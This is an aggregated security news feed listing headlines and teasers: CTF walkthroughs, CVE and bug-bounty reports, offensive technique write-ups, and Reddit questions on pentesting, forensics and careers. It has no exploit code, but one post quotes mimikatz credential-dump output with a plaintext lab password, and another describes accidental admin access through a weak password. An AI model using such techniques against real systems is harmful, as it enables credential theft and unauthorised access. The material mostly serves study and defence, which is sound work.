    Hello folks!!! My brother and I were bored this weekend and decided to play a game, so he downloaded the game. Here’s the fascinating part…  ( 4 min )
    How I passed CEH (Practical) in my first attempt by Guru HariHaraun
    Hello guys! I’m Guru HariHaraun, 21 years old. In this blog, I will be sharing with you my secret strategy I followed to pass CEH…  ( 7 min )
    How I was able to find multiple vulnerabilities of a Symfony Web Framework web application
    Found high severity vulnerability in 5 minutes just from reconnaissance. Found multiple vulnerabilities on a web application that used the…  ( 3 min )
    Hacking Microsoft Forms
    Since the growth of Online learning during this pandemic — students, researchers have been on an hunt for hacks on Microsoft Forms which…  ( 2 min )
    Day 16, Web Reconnaissance Or Information Gathering — Part 1#100DaysofHacking
    Get all the writeups from Day 1 to 15, Click Here Or Click Here.  ( 5 min )
    How I Discovered Thousands of Open Databases on AWS
    My journey on finding and reporting databases with sensitive data about Fortune-500 companies, Hospitals, Crypto platforms, Startups during…  ( 9 min )
    Simple CTF- TryHackme
    CTF  ( 3 min )
    LAB Setup — ModSecurity || Apache as reverse Proxy || Generate& Install self signed SSL…
    A: Configure Apache as reverse proxy and the application [demo.testfire.net] should be accessible via local host entry through configured…  ( 8 min )
  • Open

    Hack into Skynet —  Real World CTF (2022) walkthrough
    In this writeup, I’m sharing one of the potential methods to pwn a web challenge on Real world CTF 2022. All challenges built on top of real-world applications & due to the impact of COVID-19, The…  ( 5 min )
    Attacks on JSON Web Token (JWT)
    In part1 of the article, I introduced JSON web tokens that what is JWT and How they are made? I prefer to take a look at that before you go…  ( 8 min )
    How I ended up downloading a malware
    Hello folks!!! My brother and I were bored this weekend and decided to play a game, so he downloaded the game. Here’s the fascinating part…  ( 4 min )
    How I passed CEH (Practical) in my first attempt by Guru HariHaraun
    Hello guys! I’m Guru HariHaraun, 21 years old. In this blog, I will be sharing with you my secret strategy I followed to pass CEH…  ( 7 min )
    How I was able to find multiple vulnerabilities of a Symfony Web Framework web application
    Found high severity vulnerability in 5 minutes just from reconnaissance. Found multiple vulnerabilities on a web application that used the…  ( 3 min )
    Hacking Microsoft Forms
    Since the growth of Online learning during this pandemic — students, researchers have been on an hunt for hacks on Microsoft Forms which…  ( 2 min )
    Day 16, Web Reconnaissance Or Information Gathering — Part 1#100DaysofHacking
    Get all the writeups from Day 1 to 15, Click Here Or Click Here.  ( 5 min )
    How I Discovered Thousands of Open Databases on AWS
    My journey on finding and reporting databases with sensitive data about Fortune-500 companies, Hospitals, Crypto platforms, Startups during…  ( 9 min )
    Simple CTF- TryHackme
    CTF  ( 3 min )
    LAB Setup — ModSecurity || Apache as reverse Proxy || Generate& Install self signed SSL…
    A: Configure Apache as reverse proxy and the application [demo.testfire.net] should be accessible via local host entry through configured…  ( 8 min )
  • Open

    RWCTF 4th Desperate Cat Writeup
    在 Real World CTF 4th 中,我很荣幸再次作为出题人参与出题。我出了一道名叫 Desperate Cat 的题目,考察的是在严苛条件下 Tomcat Web 目录写文件 getshell 的利用。  ( 2 min )
    FreeBuf早报 | 去年全球共记录1862起数据泄漏事件;俄罗斯当局逮捕一国际网络犯罪组织的头目
    澳大利亚证券和投资委员会(ASIC)宣布,它正在与五家监管科技公司合作创建一个新的平台,旨在更好处理上市公司的信息。  ( 1 min )
    攻击技术研判|利用安全模式突破安全产品防线
    近期sophos的研究人员发现了名为AvosLocker的新勒索软件团伙。攻击者利用安全产品无法运行于安全模式下的防护缺失规避检测,并利用例外配置保持对目标的远程控制能力。  ( 1 min )
    modsecurity 搭建web安全防火墙和流量检测
    ModSecurity是一个开源的跨平台Web应用程序防火墙(WAF)引擎,用于Apache,IIS和Nginx,由Trustwave的SpiderLabs开发。  ( 2 min )
    在 AD FS 中获取你的万能令牌
    微软的 AD FS(联合身份验证) 服务是一种跨边界的身份识别认证服务,旨在让 AD 域外的服务使用 AD 域账户进行认证,可以在多个不同实体或组织之间实现 SSO(单点登录)。  ( 1 min )
    内网代理工具与检测方法研究
    隧道技术是一种通过使用互联网络的基础设施在网络之间传递数据的方式。使用隧道传递的数据(或负载)可以是不同协议的数据帧或包。  ( 1 min )

  • Open

    What are Sock Puppets And How To Create One?
    Sock puppets are constantly engaging in different ways across social media trying to influence what we think and what we believe. So how to Continue reading on Medium »  ( 3 min )
    Analyser une requête Twitter en 5 minutes
    Dans le cadre d’une analyse de la communication d’un concurrent ou de la recherche d’informations sur les réseaux sociaux, il peut être… Continue reading on Medium »  ( 2 min )
    Bundesservice Telekommunikation — enttarnt: Dieser Geheimdienst steckt dahinter
    Nach einer Tarnbehörde suchen und drei finden. Mit welchen einfachen Tricks deutsche Geheimdienste entlarvt werden können. Continue reading on Medium »  ( 12 min )
    CyberSoc | Cyber Detective CTF Write Up — Life Online
    OSINT-focused CTF Challenges. OSINT in Twitter, Stego, Crypto and more Continue reading on Medium »  ( 3 min )
    OSINT Tools to Use
    OSINT tools: An expanding list Continue reading on Medium »  ( 14 min )
  • Open

    CVE-2022-0185 in Linux Kernel Can Allow Container Escape in Kubernetes
    Article URL: https://blog.aquasec.com/cve-2022-0185-linux-kernel-container-escape-in-kubernetes Comments URL: https://news.ycombinator.com/item?id=30064884 Points: 2 # Comments: 0  ( 4 min )
    CVE-2021-3998 and CVE-2021-3999 in glibc's realpath() and getcwd()
    Article URL: https://www.openwall.com/lists/oss-security/2022/01/24/4 Comments URL: https://news.ycombinator.com/item?id=30057900 Points: 2 # Comments: 0  ( 5 min )
    CVE-2021-3996 and CVE-2021-3995 in util-Linux's libmount
    Article URL: https://www.openwall.com/lists/oss-security/2022/01/24/2 Comments URL: https://news.ycombinator.com/item?id=30056823 Points: 3 # Comments: 0  ( 3 min )
  • Open

    Cobalt Strike, a Defender’s Guide - Part 2
    submitted by /u/dmchell [link] [comments]
  • Open

    Using Twitter to notify careless developers — the unorthodox way (Or, how you could use GitHub to compromise 9.5K Twitter accounts without “hacking”)
    submitted by /u/sp00kyphiss [link] [comments]  ( 1 min )
    Paranoids’ Vulnerability Research: PrinterLogic Issues Security Alert
    submitted by /u/jrozner [link] [comments]
    WordPress 5.8.2 Stored XSS Vulnerability
    submitted by /u/monoimpact [link] [comments]
    Cobalt Strike, a Defender’s Guide – Part 2
    submitted by /u/TheDFIRReport [link] [comments]
    How BRATA is monitoring your bank account | Cleafy Labs
    submitted by /u/f3d_0x0 [link] [comments]
    TypeScript scenario-based web application Fuzzing Framework, supports genetic algorithm and running on CI
    submitted by /u/hi120ki [link] [comments]
    Private Network Access: introducing preflights - Chrome Developers
    submitted by /u/rhaidiz [link] [comments]
    Qiling Sandbox Escape
    submitted by /u/ly4k_ [link] [comments]
    CVE-2022-0185 – What does the newest kernel exploit mean for Kubernetes
    submitted by /u/gemyougym [link] [comments]  ( 1 min )
  • Open

    HOW I hacked thousand of subdomains
    Hello everyone Continue reading on Medium »  ( 3 min )
    Hack into Skynet —  Real World CTF (2022) walkthrough
    Continue reading on InfoSec Write-ups »  ( 4 min )
    Journey for finding the CSRF Bug lead to the finding of the 403 Forbidden error
    Hello myself Manan Aggarwal and this is my First Blog Post that while I was finding the CSRF Bug that Lead to the finding of the 403… Continue reading on Medium »  ( 2 min )
    Registrations Open for IWCON 2022 — the Online Infosec Conference & Networking Event
    Listen to 15+ awesome speakers and meet some of the coolest peeps in Infosec! Continue reading on InfoSec Write-ups »  ( 2 min )
    deBridge launches bug bounty on ImmuneFi
    This initiative is being funded by deBridge in order to improve network security and reliability for the network’s global community. Continue reading on Medium »  ( 2 min )
    Security Explained: Penetration Testing vs Bug Bounties
    In the world of application and network cybersecurity, you may have asked the question: what is penetration testing? Or what are bug… Continue reading on Medium »  ( 3 min )
  • Open

    Why are serializing bugs not a thing? Does code execution only occur during deserializing data only?
    Noticed all the fanfare around deserializing but not the opposite which is serializing a string and getting code execution from that. submitted by /u/Academic-Discount252 [link] [comments]  ( 2 min )
    Is authenticating by URL secure?
    The idea is to have a desktop .NET app that authenticates a user by having a built in browser that takes you to an SSO page, and only allows access to the app if you successfully arrive at a URL which is only accessible if you were able to successfully log in. Is this a secure method? I’m worried if there is some way of faking a URL. Is there some other alternative similar to this that is more secure, maybe something to do with certificates? I’m very new to this kinda of stuff so any help is appreciated. submitted by /u/Sloathe [link] [comments]  ( 1 min )
    Looking to make a VLAN on my Home Network to protect a New Machine
    Two of my devices have had strange occurrences over the last couple of months. I am sure its fine but it has been enough to where I don’t trust them. I Have been building a desktop and I am about to finish. My question is how to best keep my new desktop with a fresh install of Windows 10 safe from any possible malware lingering on my other two machines on the network. Would a VLAN be the way to go on something like this? Like set up a VLAN specifically for my desktop. I am new at this stuff so I apologize in advance for any annoying assumptions or questions. Thank you so much for your consideration. EDIT: I also have an unmanaged switch and a Netgear wifi extender/access point at my disposal. My ISP is Xfinity. EDIT: VLAN needs a managed switch so its a no go. submitted by /u/Zpointe [link] [comments]  ( 1 min )
    Could other logging systems have similar flaws to log4shell if fuzzed properly?
    The problem with log4shell is it was overblown and very buzz wordy when it relied on a known flaw from years ago called jdni injection but im thinking bigger then jdni and java. Could other programming languages like php python ruby aspx/net framework have similar flaws to force their logging system to execute a log as code? Most logging systems don’t have fancy features like jdni ldap etc so im not sure what you could leverage to force code to be executed. submitted by /u/Academic-Discount252 [link] [comments]  ( 1 min )
    How do I get out?
    Hi all, bit of an usual one for you - I really want out of cybersecurity. I've got about 3 years of experience in netsec, mostly doing app and infrastructure security testing and honestly I hate it. Every project is a brand new technology I've got little experience in and I always end up feeling like I couldn't possibly have tested it 100% properly. I have major anxiety and panic issues and I'm finding the entire thing just too stessful and have completely burnt out in a few short years. So my question is: Has anyone successfully transitioned into another IT space from cyber security? I would love to just be a sysadmin and only have a single network and set of technologies to contend with, so I can feel like i'll truly master them and become properly proficient. The problem is I think I'll have a lot of stigma going into interviews as it will be very obvious I couldn't handle netsec and am looking for an out, especially considering as I'm on £50k and will likely need to take a cut down to 25k-35k to get into a role like this. So any advice anyone can offer for how to approach this situation? Do I need to go get an entirely different set of certs before I'll even be considered? signed, a very burnt out pentester submitted by /u/mekkr_ [link] [comments]  ( 8 min )
    Interview technical test
    Hey guys, I'm interviewing for a jr pen tester position and was asked for a technical test that consists in checking the security of an IP target that is hosted in the AWS cloud. I can use whatever tool I want as long as I find issues in the IP target and recommend ways to solve the issue. I have three days to do this test, and I'm looking to learn whatever I have to learn to take this next step that will change my life forever, but I have no idea how to start. Can you guys point me in the right direction? What resources do I have to start learning that? Thank you, and sorry if this doesn't fall in the scope of the subreddit. submitted by /u/Kelvien [link] [comments]  ( 2 min )
    A HUGE untapped attack surface for auth bypassing: Arbitrary Server Side Forwards also known as Unvalidated Forwards or Dangerous Forwards. Its basically SSRF-Lite.
    Barely any blogs or posts cover this stuff indepth enough for my liking and some of the biggest auth bypasses in java apps stem from their requestdispatch forward feature which allows you to access internal authenticated apis and endpoints as a non logged in session. What im wondering is if theres anything anagalous like this in other popular languages like php ruby on rails django etc to do the same thing and if not is there any research regarding auth bypasses for open redirects which are more client side based and I don’t believe they can be used for auth bypasses since forwards are internal/server sided and keep session and parameter data intact where as redirects are client sided and initialize fresh session data so they seem less useful then forwards. The only time ive seen an open redirect possibly bypass authentication is in combination with a ssrf or some feature where the web app follows the url and then follows that urls redirect internally. Would love fellow netsecs peeps insight on this under researched phenomenon. submitted by /u/Academic-Discount252 [link] [comments]  ( 1 min )
    Interview Question
    Hi guys, I have an interview for Intern SOC analyst in one of the reputed organization and the interview will consist some technical lab as well, any idea what can the lab questions?? How can I prepare for the lab examination. submitted by /u/Either_Attempt_9108 [link] [comments]  ( 2 min )
  • Open

    Registrations Open for IWCON 2022 — the Online Infosec Conference & Networking Event
    Listen to 15+ awesome speakers and meet some of the coolest peeps in Infosec!  ( 2 min )
  • Open

    Registrations Open for IWCON 2022 — the Online Infosec Conference & Networking Event
    Listen to 15+ awesome speakers and meet some of the coolest peeps in Infosec!  ( 2 min )
  • Open

    Registrations Open for IWCON 2022 — the Online Infosec Conference & Networking Event
    Listen to 15+ awesome speakers and meet some of the coolest peeps in Infosec!  ( 2 min )
  • Open

    Movies and series
    submitted by /u/omnifage [link] [comments]
    Dataset and model of the universe
    Gaia is a European space mission providing astrometry, photometry, and spectroscopy of more than 1000 million stars in the Milky Way. Also data for significant samples of extragalactic and Solar system objects is made available. The Gaia Archive contains deduced positions, parallaxes, proper motions, radial velocities, and brightnesses. Complementary information on multiplicity, photometric variability, and astrophysical parameters is provided for a large fraction of sources. http://cdn.gea.esac.esa.int/ Browse to https://gea.esac.esa.int/ for info. submitted by /u/inoculatemedia [link] [comments]  ( 1 min )
  • Open

    Paranoids’ Vulnerability Research: PrinterLogic Issues Security Alert
    Article URL: https://www.yahooinc.com/paranoids/paranoids-vulnerability-research-printerlogic-issues-security-alert/ Comments URL: https://news.ycombinator.com/item?id=30060422 Points: 2 # Comments: 0  ( 8 min )
    F5 fixes high-risk Nginx Controller vulnerability in January patch rollout
    Article URL: https://portswigger.net/daily-swig/f5-fixes-high-risk-nginx-controller-vulnerability-in-january-patch-rollout Comments URL: https://news.ycombinator.com/item?id=30060420 Points: 2 # Comments: 0  ( 3 min )
  • Open

    SecWiki News 2022-01-24 Review
    初探node.js相关之原型链污染 by ourren 2021攻击技术发展趋势报告 by ourren SecWiki周刊(第412期) by ourren 内网代理工具与检测方法研究 by xiahao90 狩猎样本的哈希游戏 by Avenger 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-01-24 Review
    初探node.js相关之原型链污染 by ourren 2021攻击技术发展趋势报告 by ourren SecWiki周刊(第412期) by ourren 内网代理工具与检测方法研究 by xiahao90 狩猎样本的哈希游戏 by Avenger 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Exfiltration
    I'd like to start a brief discussion that might be a great learning opportunity for a lot of newbie forensic investigators - From a forensics standpoint, how would you tell if a file was exfiltrated? For this scenario, I'm thinking ransomware gang exfiltrates data before encrypting and is using a cloud based solution for storage. submitted by /u/DeadBirdRugby [link] [comments]  ( 3 min )
    Does anyone have experience with /media/0/.RecycleBin? (Android)
    If a file has a creation time and has this location, does this mean the creation time is the time the file was put there? And therefore "deleted"? submitted by /u/DHZX [link] [comments]  ( 1 min )
    Cobalt Strike, a Defender’s Guide – Part 2
    submitted by /u/TheDFIRReport [link] [comments]  ( 1 min )
  • Open

    安全分析技术的“前世今生”
    过去十年中,安全分析这项技术发生了怎样的变化?本文将和大家一起探讨安全分析的演变和价值。  ( 1 min )
    数千工业组织的企业电子邮件账户失窃,被滥用进行下一次攻击
    攻击者滥用企业邮箱的联系人信任发起攻击,从一个工业企业传播到另一个工业企业。  ( 1 min )
    在公司里他们只想低调,但是实力不允许
    斗象科技首届内部攻防演练圆满结束。
    斗象科技荣膺2021年网络安全优秀企业“安全服务十强”
    成功入选并荣获“安全服务十强”称号
    《2021年全国移动应用安全观测报告》
    当前,我国网络安全形势依然严峻,在大数据时代下,网络安全存在着病毒威胁、网络诈骗、黑客入侵、信息丢失等各种安全隐患。  ( 1 min )
    《2021业务风控洞察报告》正式发布
    从业务安全、内容安全、跨境安全三个维度对2021年典型欺诈场景和案例进行了深入剖析。
    FreeBuf早报 | 俄罗斯央行建议禁止加密货币;黑客将恶意程序植入到 UEFI 固件中
    一项新调查显示,过去三年中,针对世界各地公司的网络攻击数量增加了 15%。  ( 1 min )
    从重大漏洞应急看云原生架构下的安全建设与安全运营(上)
    重大漏洞的应急响应总结与安全运营驱动的安全能力建设  ( 1 min )
    浅谈PHP伪协议
    php中有很多封装协议,最常见的如file协议,php协议,data协议,zip和phar协议等等。  ( 1 min )
  • Open

    Forge HackTheBox Walkthrough
    Introduction Forge is a CTF Linux box rated “medium” on the difficulty scale on the HackTheBox platform. The box covers subdomain enumeration, SSRF attacks and The post Forge HackTheBox Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    Forge HackTheBox Walkthrough
    Introduction Forge is a CTF Linux box rated “medium” on the difficulty scale on the HackTheBox platform. The box covers subdomain enumeration, SSRF attacks and The post Forge HackTheBox Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    CVE-2021-33742:Internet Explorer MSHTML 堆越界写漏洞分析
    作者:天融信阿尔法实验室 原文链接:https://mp.weixin.qq.com/s/nfPm0B2Z9dTodsw-VTUxpQ 1 漏洞背景 2021年07月14日Google威胁分析团队(TAG:Threat Analysis Group)发布了一篇标题为"How We Protect Users From 0-Day Attacks"的文章。这篇文章公布了2021年Google威...
  • Open

    CVE-2021-33742:Internet Explorer MSHTML 堆越界写漏洞分析
    作者:天融信阿尔法实验室 原文链接:https://mp.weixin.qq.com/s/nfPm0B2Z9dTodsw-VTUxpQ 1 漏洞背景 2021年07月14日Google威胁分析团队(TAG:Threat Analysis Group)发布了一篇标题为"How We Protect Users From 0-Day Attacks"的文章。这篇文章公布了2021年Google威...
  • Open

    No length on password
    Imgur disclosed a bug submitted by blackfly_: https://hackerone.com/reports/1411363 - Bounty: $250

  • Open

    mimikatz LogonPasswords and usernames with dollar sign ($) at the end
    I have a lab that I'm testing mimikatz on. Some of the usernames are dumped as "hostname$" What does that mean? hostname being the actual host name of the test server being in this case "labserver"; so it will be something like: [...] kerberos : * Username : labserver$ * Domain : lab.corp * Password : P@ssW0rd!! submitted by /u/ak_z [link] [comments]  ( 1 min )
    [Malware] I've started studying malware and more specifically backdoors, but something seems to not make any sense.
    Hey, i've recently started to study how backdoors work and are used / made. But i've noticed that every backdoor i've come accross follows this principle : A client runs on the target and tries to connect to the attacker to give him access. The server runs on the attacker and waits for a connection from the target. Shouldn't this be the opposite so the attacker can gain access whenever he wants ? Isn't the purpose of a backdoor to be an easy for the attacker to come back later? If so doesn't it defeat it ? Am i misunderstanding something ? I hope someone can help me clarify this. PS : I'm not asking this to commit any sort of crime, i'm genuinely interested in cybersecurity research and thats why i'm asking this question. submitted by /u/fleurdelys- [link] [comments]  ( 2 min )
    Which do you think is the higher tier in cyber security?
    Soc analyst or security analyst? submitted by /u/lowkiwatchingyou [link] [comments]  ( 1 min )
    Weak password found on "accident"
    Backstory for question: I'm currently on the process of getting a job and I was sent a link (via email) to a psychological test which required a username and password to login, the user was already typed for me (sent as parameter on the url) and the password was sent on the email. At first I didn't read the full email so I entered the link and when I saw I needed a password, I thought that there must've been a mistake, so I typed a "random" password to see what would happen (I typed the same user as the pass) and I was able to log in. I was very confused as I was greeted with a page full of information regarding the account I was logged in to and as I explored further I was able to see personal information regarding other people that have done the quiz. At this point I realized that I wasn't supposed to be able to read this info so I logged out and tried another password (I was thinking that maybe the account accepted everything you typed) but no, I got a "wrong password" text. I read the email again, this time I saw that the password I was supposed to use was always there, I try it and I log in succesfully, but now it doesn't redirect me to the admin panel, it takes me to the psych test I'm supposed to be doing. As a NetSec Student, I know that I should let the company know about this weak password, but I don't know how to do it without it looking like I was on purpose trying to log in with another password different than the one provided via email and maybe get in trouble with the company I'm applying to. Worded as a question: What is the best way to let a company know that they have a vulnerability on an account? TL;DR: Got sent user and pass for an account, tried same user as pass instead (because I'm dumb and didn't read full email) and logged in as admin. Want to disclose this to the company but don't want to get in trouble. submitted by /u/Emacholo [link] [comments]  ( 3 min )
    Advice on a DAST Tool to Handle Single Page Apps
    Hi everyone, I’m currently looking for a DAST scanner that works well with single page applications (I’m using Ember.js with a couple of APIs behind it). For example, every tool I’ve tried has not been able to effectively test for XSS, as they can’t link injection points from API calls back to the rendered DOM on the monolithic front end. Any tools, advice, etc. would be so greatly appreciated. Also, please note that I already utilize SCA and SAST, and will be moving to IAST in the future – this is solely about DAST. Cost is not a concern, just effectiveness. submitted by /u/shadowcorp [link] [comments]  ( 1 min )
    Jumping from Application Developer/DevOps to Application Security Engineer
    Hey everyone, I'm 27, relatively new into tech (4 yesrs of experience). I'm a full stack developer, experienced with DevOps and CI/CD pipelines, and I have a CISSP. My goal is to ultimately become a jack of all trades architect. I'm potentially getting an opportunity to move into an application security engineering role that has significantly less development, and a lot more threst modeling, security architecture, pen testing, etc. I've never done those things, I've only studied them. Is it worth it to switch into a much more high level security oriented position? Would I be abandoning my primary skill set? Or is there a way to combine the 2 down the line? I'd love to hear your experience, your advice, and how your own career grew. submitted by /u/pyscho94 [link] [comments]  ( 1 min )
    Strange unknown local device found when running Wireshark and filtering via ARP
    Hi, I apologize in advance if this does not fit this subreddit. I was running wireshark on my home network and was filtering by ARP to test some things. But in the process I found a strange device with a Facebook mac adress. https://imgur.com/a/HbNuWdE (note, I removed the mac for the router) It was only the router asking for ip and not vice verca. Why would the router ask for it in the first place? Any info/explination would be appreciated. submitted by /u/Wattcat [link] [comments]  ( 1 min )
    Career pivot!
    Looking to pivot the the cyber security world. Studying for a sec + cert, have a secret clearance, and got a cyber cert from MIT. Have 2 years of DOD consulting experience. And an engineering degree. Looking at roles like “cybersecurity engineer” and cybersecurity analyst What kind of compensation can I expect as a government contractor with the above resume? I’m looking to get into the RMF/Policy/Vulnerability Assessment world. I am trying to create a future path for myself down the road. submitted by /u/tbrady1001 [link] [comments]  ( 1 min )
    Making the jump from IT Support to Security - Advice needed
    Hello, Looking to move into IT Security from IT Support. I currently have 15+ years in IT Support (1st, 2nd, 3rd line IT support). Unfortunately I'm pretty clueless on progression steps and the certs needed to climb up the Security ladder. I don't like the idea of CISSP as that appears to be geared towards management, but like the look of Security Analysis/Defensive/Offensive. With my IT background what certs should I look at? I was thinking GCIH as a start? Also would 2 years as a Security Analyst with a couple of certs be enough to progress in a new company? Or would 5 years (for example) be the minimum I would realistically need? Any advice/insight would be appreciated and apologies if this is the wrong forum. submitted by /u/ZoidbergsMinions [link] [comments]  ( 5 min )
    Security for Personal IT Tutor
    Hi, I’m getting increasing requests from friends of friends of family to do some basic IT support work for them. With close family members I have been entrusted with access to their password managers and unattended remote access, which is really useful to be able to help with things they can’t do themselves or when they’re away from their devices - all the credentials for this are kept in a totally separate password manager from my personal accounts. However I recognise that this is big security risk, and if I’m going to be working with people outside my family, I want to avoid exposing them to unnecessary risk without severely limiting my ability to help them. What should I be conscious of in setting up a remote access solution for this purpose? Are there any good ways that clients can share passwords or access to specific accounts without me having access to their entire password manager? submitted by /u/marquitanavin [link] [comments]  ( 1 min )
    Temporal Scoring - CVSS How to Input
    So right now I am using CVSS v3.0 base scoring to calculate severity of a findings from scanning tools like Tenable.sc, snyk, and some other tools. I want to go farther and factor the CVSS Temporal score into the severity so I can prioritize better... question is how do I do that when I have 1,000+ findings and can't do it manually? Where can I get a feed or service or point in time data to get that? NVD does not provide it. ​ Thank you! submitted by /u/ThrowThrowAway789 [link] [comments]  ( 1 min )
  • Open

    A new shellcode injection methodology
    submitted by /u/Idov31 [link] [comments]
    Binary-only fuzzong with python, Qemu and LibAFL
    submitted by /u/domenukk [link] [comments]
    Doing a uni project on pen testing and appreciated this article for help writing up an information disclosure vulnerability. Though some of you might appreciate it too.
    submitted by /u/PlatonicDogLover93 [link] [comments]  ( 1 min )
    Backdoor Found in Themes and Plugins from AccessPress Themes (CVE-2021-24867)
    submitted by /u/ScottContini [link] [comments]
  • Open

    The Threat Landscape and Attribution
    Over the years, changes in the threat landscape have made attribution more difficult. Attribution has always been challenging, but has been and can continue to be eased through visibility. That is, if your view into an event or campaign is limited to resources such as malware samples pulled from public repositories, then attribution can be challenging. Even adding information regarding infrastructure extracted from the sample configs can still give a somewhat limited view. However, as visibility is expanded to include data from intrusions and incidents, attribution becomes clearer and more granular. I ran across A Complex Threat Landscape Muddles Attribution recently and found it to be a fascinating, insightful read, one that anyone involved in threat intelligence, even peripherally, shoul…  ( 8 min )
  • Open

    Wildfire videos - wireless research UCSD
    The High Performance Wireless Research and Education Network (HPWREN), a University of California San Diego partnership project led by the San Diego Supercomputer Center and the Scripps Institution of Oceanography's Institute of Geophysics and Planetary Physics, supports Internet-data applications in the research, education, and public safety realms. HPWREN functions as a collaborative, Internet-connected cyberinfrastructure. The project supports a high-bandwidth wireless backbone and access data network in San Diego, Riverside, and Imperial counties in areas that are typically not well-served by other technologies to reach the Internet. This includes backbone locations, typically sited on mountain tops, to connect often hard-to-reach areas in the remote Southern California back country. http://hpwren.ucsd.edu/HWB/ submitted by /u/inoculatemedia [link] [comments]  ( 1 min )
    Indiana Department of Homeland Security Fire Regulation Variance Requests
    submitted by /u/Typographical_Terror [link] [comments]  ( 1 min )
    Books on Theorists of Education [PT-BR]
    submitted by /u/afmachado [link] [comments]
  • Open

    Tracing Tor router connections within a host
    Hi there, I'm analysing a memory dump from an infected system that is running a cryptominer and connecting to the mining server through a Tor router. I know the processes of the miner and the tor router it installed on the system. Is there a way to show the miner handing over the IP of the actual mininf server to the Tor router? The firewall of course just sees the connection to the next Tor router. submitted by /u/NazgulNr5 [link] [comments]  ( 1 min )
    What are some jobs that you can do with experience in computer forensics?
    I have a very close friend who has been doing computer forensics for well over 10 years and has experience with networking technology too. They've been working for local law enforcement all this time and has had to deal with "very bad sexual content" for quite a long time and it's really starting to eat away at their mental health. They really would like a job change. They are willing to work in law enforcement as long as the work doesn't involve kids. They make good money at the police department they work at now so a part of the equation is a paycheck. They are hoping to work at this job for the rest of their career. Teaching would also be an option. Thanks for any answers. submitted by /u/Onece_in_a_life_time [link] [comments]  ( 3 min )
  • Open

    Process Ghosting Attack
    Introduction Gabriel Landau released a post on Elastic Security here which talks about a technique through which antivirus evasion was found to be possible. The The post Process Ghosting Attack appeared first on Hacking Articles.  ( 8 min )
    Corrosion: 2 VulnHub Walkthrough
    Proxy Programmer’s Corrosion: 2 is a Vulnhub medium machine. We can download the lab from here. This lab is designed for experienced CTF players who The post Corrosion: 2 VulnHub Walkthrough appeared first on Hacking Articles.  ( 6 min )
    Intelligence HacktheBox Walkthrough
    Introduction Intelligence is a CTF Windows box with difficulty rated as “medium” on the HackTheBox platform. The machine covers OSINT, AD attacks, and silver ticket The post Intelligence HacktheBox Walkthrough appeared first on Hacking Articles.  ( 7 min )
  • Open

    Process Ghosting Attack
    Introduction Gabriel Landau released a post on Elastic Security here which talks about a technique through which antivirus evasion was found to be possible. The The post Process Ghosting Attack appeared first on Hacking Articles.  ( 8 min )
    Corrosion: 2 VulnHub Walkthrough
    Proxy Programmer’s Corrosion: 2 is a Vulnhub medium machine. We can download the lab from here. This lab is designed for experienced CTF players who The post Corrosion: 2 VulnHub Walkthrough appeared first on Hacking Articles.  ( 6 min )
    Intelligence HacktheBox Walkthrough
    Introduction Intelligence is a CTF Windows box with difficulty rated as “medium” on the HackTheBox platform. The machine covers OSINT, AD attacks, and silver ticket The post Intelligence HacktheBox Walkthrough appeared first on Hacking Articles.  ( 7 min )
  • Open

    My Pentest Log -4-
    Greetings from Constantinople to all, Continue reading on Medium »  ( 2 min )
    Creating easy proof-of-concept scripts with Python and Curl.
    Hello Hunters! Continue reading on Medium »  ( 3 min )
    PORTSWIGGER WEB SECURITY - XSS (CROSS SITE SCRIPTING) LAB ÇÖZÜMLERİ
    Cross Site Scripting (Siteler Arası Komut Dosyası Çalıştırma), saldırganın bir web uygulamasında çalıştırdığı zararlı komutlar sonucunda… Continue reading on Medium »  ( 32 min )
    Fuzzing is always fun..!!
    Hello Everyone, Continue reading on Medium »  ( 2 min )
    Setting up a Free VPS for Bug Bounty & More
    Finding Bugs can be Time consuming and as for day-to-day life, you are not sitting on your one computer all day unless you are a… Continue reading on Medium »  ( 3 min )
    How I was able to find multiple vulnerabilities of a Symfony Web Framework web application
    Found high severity vulnerability just from reconnaissance. Found multiple vulnerabilities on a web application that used the Symfony web… Continue reading on Medium »  ( 2 min )
  • Open

    Show HN: TypeScript Scenario-Based Web Application Fuzzing Framework
    Article URL: https://github.com/shfz/shfz Comments URL: https://news.ycombinator.com/item?id=30047196 Points: 1 # Comments: 0  ( 4 min )
  • Open

    SecWiki News 2022-01-23 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-01-23 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    你家的wifi安全么?
    你家的Wifi安全么,有没有可能被别人蹭网,或者被黑客登录进来,窃取数据?  ( 1 min )
    域内常用的操作精简版
    当我们渗透进了内网当中,我们需要快速确定我们自身所处的环境,以及我们需要确定接下来该如何行动。这篇文章非常精简的介绍了这些操作  ( 1 min )
  • Open

    Intigriti’s January XSS challenge By TheRealBrenu
    First challenge for 2022 is here by TheRealBrenu. This one is a good example of javascript source maps, which I was unfamiliar at first… Continue reading on Medium »  ( 3 min )
  • Open

    OSINT Double Trouble
    It’s a new year, and that means new OSINT Challenges to solve. This time around, I’ll be solving 2 challenges courtesy of Twitter’s… Continue reading on Medium »  ( 4 min )
  • Open

    Cracking Kubernetes Network Policy
    TL; DR This post digs into the Kubernetes NetworkPolicy model, then designs a policy enforcer based on the technical requirements and further implements it with less than 100 lines of eBPF code. Hope that after reading through this post, readers will get a deeper understanding on how network policies are enforced in the underlying. Code and scripts in this post: here. TL; DR 1 Introduction 1.1 Access control (NetworkPolicy) in Kubernetes 1.2 How policies could be enforced in the underlying? 1.3 Purpose of this post 2 Design a dataplane policy enforcer 2.1 Introducing service identity 2.2 Introducing identity store: Labels Identity 2.3 Introducing policy cache 2.4 Introducing IPCache: PodIP -> Identity 2.5 Hooking and parsing traffic 2.6 Compose up: an end-to-end workflow 3 Imp…

  • Open

    I'm working in security and stuck on whether I should learn Web Development
